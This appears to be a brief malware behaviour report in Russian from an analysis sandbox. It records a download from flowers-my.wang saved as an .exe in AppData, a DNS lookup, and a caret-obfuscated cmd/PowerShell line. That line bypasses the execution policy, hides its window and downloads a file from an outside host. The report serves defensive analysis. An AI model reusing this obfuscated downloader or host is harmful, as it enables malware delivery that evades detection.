Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Owe^rS^hElL.EXE^ -ExEc^UTIo^np^OlIcY ^B^Y^P^As^s ^-nO^prO^f^ilE ^-winDO^wsT^yL^e H^Id^dEn^ ^(n^E^w-Obj^E^ct^ S^y^S^t^em^.net.^we^bc^L^iE^N^t)^.^DOwn^LOA^D^fIL^E('http:/...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "P^Owe^rS^hElL.EXE^ -ExEc^UTIo^np^OlIcY ^B^Y^P^As^s ^-nO^prO^f^ilE ^-winDO^wsT^yL^e H^Id^dEn^ ^(n^E^w-Obj^E^ct^ S^y^S^t^em^.net.^we^bc^L^iE^N^t)^.^DOwn^LOA^D^fIL^E('http:/...' (со скрытым окном)